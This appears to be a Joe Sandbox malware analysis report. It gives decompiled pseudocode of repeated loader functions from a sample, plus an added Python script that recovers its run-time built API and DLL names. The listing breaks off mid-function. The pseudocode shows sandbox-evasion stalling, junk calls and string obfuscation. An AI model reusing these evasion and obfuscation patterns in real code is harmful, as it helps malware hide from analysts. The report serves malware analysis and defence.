    				_push("zzdjjqpqaxlgt");
    				_t13 = E00402E18(_t12);
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t13) != 0) {
    					L4:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t15 = E00401CAE(_t14); // executed
    					__eflags = _t15;
    					if(_t15 != 0) {
    						L16:
    						L17:
    						goto L17;
    					}
    					__eflags = _t50 - 0xfd00;
    					if(_t50 < 0xfd00) {
    						goto L16;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t19 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t19;
    					_t40 = "pejpCreate";
    					 *_t40 = 0x70616548;
    					 *((short*)(_t40 + 4)) = 0x7243;
    					 *((short*)(_t40 + 6)) = 0x6165;
    					_push(_t40);
    					_push(_t19);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t19);
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t20 = E00401CAE(_t19); // executed
    					__eflags = _t20;
    					if(_t20 != 0) {
    						goto L16;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t50 - 4)) = _t23;
    					_push(_t23);
    					__eflags = _t23;
    					if(_t23 == 0) {
    						goto L16;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t24 = E00402E18(_t23); // executed
    					_push("true");
    					 *_t52 =  *_t52 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t25 = E00402BB3(_t24); // executed
    					__eflags = _t25;
    					if(_t25 != 0) {
    						goto L16;
    					}
    					_push(0x1e);
    					do {
    						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t52 =  *_t52 - 1;
    						__eflags =  *_t52;
    					} while ( *_t52 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t27); // executed
    					_pop(_t44);
    					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
    					_t48 = _t44;
    					 *0x405002 = _t48 + 0xa4;
    					_t29 =  *0x405002;
    					_t30 =  *_t29;
    					 *0x405002 = _t30;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L16;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L16;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t35);
    					 *0x40501a =  *0x40501a + _t35;
    					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t14 != 0) {
    					goto L4;
    				}
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t14 != 0) {
    					goto L4;
    				}
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t14);
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E0040257D() {
    				void* _t11;
    				void* _t13;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				void* _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				signed int _t34;
    				void* _t35;
    				void* _t36;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    				void* _t60;
    
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L1:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					if(_t13 != 0 || _t49 < 0xfd00) {
    						L16:
    						L17:
    						goto L17;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t17 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t17;
    						_t39 = "pejpCreate";
    						 *_t39 = 0x70616548;
    						 *((short*)(_t39 + 4)) = 0x7243;
    						 *((short*)(_t39 + 6)) = 0x6165;
    						_push(_t39);
    						_push(_t17);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t17);
    						_push(1);
    						 *_t51 =  *_t51 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						if(_t18 != 0) {
    							goto L16;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t49 - 4)) = _t21;
    						_push(_t21);
    						if(_t21 == 0) {
    							goto L16;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t22 = E00402E18(_t21); // executed
    						_push("true");
    						 *_t51 =  *_t51 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t23 = E00402BB3(_t22); // executed
    						if(_t23 != 0) {
    							goto L16;
    						}
    						_push(0x1e);
    						do {
    							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t51 =  *_t51 - 1;
    						} while ( *_t51 != 0);
    						_t51 = _t51 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t25); // executed
    						_pop(_t43);
    						 *_t51 =  *_t51 +  *((intOrPtr*)(_t43 + 0x3c));
    						_t47 = _t43;
    						 *0x405002 = _t47 + 0xa4;
    						_t27 =  *0x405002;
    						_t28 =  *_t27;
    						 *0x405002 = _t28;
    						_t60 =  *0x405002 - 0xfff;
    						if(_t60 > 0) {
    							goto L16;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t60 < 0) {
    							goto L16;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t33);
    						 *0x40501a =  *0x40501a + _t33;
    						if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t34 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push( *0x4050cf);
    				_t35 = E00402AD0(_t34);
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t35) != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t36) != 0) {
    					goto L1;
    				}
    				_push(E00401784);
    				return E00401784;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E00401000() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    
    				_push("true");
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L4:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L16:
    						L17:
    						goto L17;
    					}
    					__eflags = _t49 - 0xfd00;
    					if(_t49 < 0xfd00) {
    						goto L16;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t39 = "pejpCreate";
    					 *_t39 = 0x70616548;
    					 *((short*)(_t39 + 4)) = 0x7243;
    					 *((short*)(_t39 + 6)) = 0x6165;
    					_push(_t39);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L16;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t49 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L16;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t51 =  *_t51 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L16;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t51 =  *_t51 - 1;
    						__eflags =  *_t51;
    					} while ( *_t51 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t43);
    					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
    					_t47 = _t43;
    					 *0x405002 = _t47 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L16;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L16;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push("zzdjjqpqaxlgt");
    				_t37 = E00402E18(_t36);
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t37) != 0) {
    					goto L4;
    				}
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L4;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E00401D28() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L4:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L16:
    						L17:
    						goto L17;
    					}
    					__eflags = _t49 - 0xfd00;
    					if(_t49 < 0xfd00) {
    						goto L16;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t39 = "pejpCreate";
    					 *_t39 = 0x70616548;
    					 *((short*)(_t39 + 4)) = 0x7243;
    					 *((short*)(_t39 + 6)) = 0x6165;
    					_push(_t39);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L16;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t49 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L16;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t51 =  *_t51 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L16;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t51 =  *_t51 - 1;
    						__eflags =  *_t51;
    					} while ( *_t51 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t43);
    					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
    					_t47 = _t43;
    					 *0x405002 = _t47 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L16;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L16;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push( *0x4050cf);
    				_t36 = E00402AD0(_t12);
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t36) != 0) {
    					goto L4;
    				}
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L4;
    				}
    				_push( *0x4050cf);
    				E00402AD0(_t12);
    				_push(E00402CDE);
    				return E00402CDE;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E00401CB5() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L4:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L16:
    						L17:
    						goto L17;
    					}
    					__eflags = _t49 - 0xfd00;
    					if(_t49 < 0xfd00) {
    						goto L16;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t39 = "pejpCreate";
    					 *_t39 = 0x70616548;
    					 *((short*)(_t39 + 4)) = 0x7243;
    					 *((short*)(_t39 + 6)) = 0x6165;
    					_push(_t39);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L16;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t49 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L16;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t51 =  *_t51 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L16;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t51 =  *_t51 - 1;
    						__eflags =  *_t51;
    					} while ( *_t51 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t43);
    					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
    					_t47 = _t43;
    					 *0x405002 = _t47 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L16;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L16;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t36) != 0) {
    					goto L4;
    				}
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L4;
    				}
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t12);
    				_push(E004023F0);
    				return E004023F0;
    			}

    Instruction addresses for the listing above (the address column, spilled one per line by extraction): prologue 0x00401cb5-0x00401ccc; the L4 path executes in the block shared with the other functions at 0x00401e1e-0x00401fd9, with L16/L17 at 0x00402749-0x0040274c; the fall-through path at 0x00401cd2-0x00401d25.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
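    The listing above shows three run-time string constructions: "kernel3" written one byte at a time to 0x305061-0x305067, the decoy literal "pejpCreate" overwritten in place with the dword 0x70616548 and the words 0x7243 / 0x6165, and the wide literal L"oidsapi.dll" patched to a different DLL name. None of these final strings is visible to a static string scan. The following parser is an added example, not part of the Joe Sandbox report or of the sample; it recovers those strings from the immediates exactly as they appear in the decompiled text. Assumptions: the excerpt is copied from the E00401CB5 listing, the trailing "2" of "kernel32" is not among the stores shown (so only "kernel3" is recovered), and the store to M00405038 is taken to hit the second wide character of L"oidsapi.dll" (the report does not state the offset).

```python
"""Recover run-time constructed strings from decompiler output.

Added example; not code from the report or the analysed sample.
"""
import re
import struct

# Constructed excerpt: lines copied from the report's E00401CB5 listing.
LISTING = """
 *0x305061 = 0x6b;
 *0x00305062 = 0x65;
 *0x00305063 = 0x72;
 *0x00305064 = 0x6e;
 *0x00305065 = 0x65;
 *0x00305066 = 0x6c;
 *0x00305067 = 0x33;
_t39 = "pejpCreate";
 *_t39 = 0x70616548;
 *((short*)(_t39 + 4)) = 0x7243;
 *((short*)(_t39 + 6)) = 0x6165;
"""

# ASSUMPTION: the two wide-char stores hit index 0 and index 1 of the decoy.
NTDSAPI_DECOY = "oidsapi.dll"
NTDSAPI_PATCHES = {0: 0x6E, 1: 0x74}

ABS_BYTE_STORE = re.compile(r'\*\s*0x([0-9a-fA-F]+)\s*=\s*0x([0-9a-fA-F]{1,2});')
VAR_STR = re.compile(r'(_t\d+)\s*=\s*"([^"]*)";')
VAR_DWORD = re.compile(r'\*(_t\d+)\s*=\s*0x([0-9a-fA-F]+);')
VAR_WORD = re.compile(
    r'\*\(\(short\*\)\((_t\d+)\s*\+\s*(\d+)\)\)\s*=\s*0x([0-9a-fA-F]+);')


def absolute_byte_stores(listing):
    """Collect single-byte stores to absolute addresses and join runs of
    consecutive addresses into byte strings, lowest address first."""
    stores = {int(a, 16): int(v, 16) for a, v in ABS_BYTE_STORE.findall(listing)}
    runs, current, prev = [], bytearray(), None
    for addr in sorted(stores):
        if prev is not None and addr != prev + 1:
            runs.append(bytes(current))
            current = bytearray()
        current.append(stores[addr])
        prev = addr
    if current:
        runs.append(bytes(current))
    return runs


def patched_string_literals(listing):
    """Apply little-endian dword/word overwrites to the string literals
    assigned to temporaries, returning the final contents per temporary."""
    bufs = {var: bytearray(s.encode()) for var, s in VAR_STR.findall(listing)}
    for var, val in VAR_DWORD.findall(listing):
        if var in bufs:
            bufs[var][0:4] = struct.pack("<I", int(val, 16))
    for var, off, val in VAR_WORD.findall(listing):
        if var in bufs:
            o = int(off)
            bufs[var][o:o + 2] = struct.pack("<H", int(val, 16))
    return {var: bytes(b).decode("latin-1") for var, b in bufs.items()}


def patch_wide_literal(decoy, patches):
    """Overwrite individual wide characters of a decoy literal."""
    chars = list(decoy)
    for idx, val in patches.items():
        chars[idx] = chr(val)
    return "".join(chars)


if __name__ == "__main__":
    for run in absolute_byte_stores(LISTING):
        print("byte-store run:", run)
    for var, s in patched_string_literals(LISTING).items():
        print("patched literal", var, "->", s)
    print("patched wide literal ->", patch_wide_literal(NTDSAPI_DECOY, NTDSAPI_PATCHES))
```

    Running it reports the byte-store run "kernel3", the patched literal "HeapCreate" (so the later GetProcAddress resolves a heap allocator, not a function named "pejpCreate"), and the wide literal "ntdsapi.dll" handed to LoadLibraryExW. The same regexes can be pointed at any other function in the report to check whether it constructs further names.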
    C-Code - Quality: 48%
    			E00402183() {
    				void* _t11;
    				void* _t12;
    				void* _t14;
    				struct HINSTANCE__* _t18;
    				void* _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				void* _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				signed int _t35;
    				void* _t36;
    				void* _t37;
    				void* _t38;
    				intOrPtr* _t42;
    				void* _t46;
    				void* _t50;
    				void* _t52;
    				intOrPtr* _t54;
    				void* _t63;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push(1);
    				 *_t54 =  *_t54 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t12) != 0) {
    					L1:
    					_push(1);
    					 *_t54 =  *_t54 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t14 = E00401CAE(_t13); // executed
    					if(_t14 != 0 || _t52 < 0xfd00) {
    						L15:
    						L16:
    						goto L16;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t42 = "pejpCreate";
    						 *_t42 = 0x70616548;
    						 *((short*)(_t42 + 4)) = 0x7243;
    						 *((short*)(_t42 + 6)) = 0x6165;
    						_push(_t42);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t54 =  *_t54 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						if(_t19 != 0) {
    							goto L15;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t52 - 4)) = _t22;
    						_push(_t22);
    						if(_t22 == 0) {
    							goto L15;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
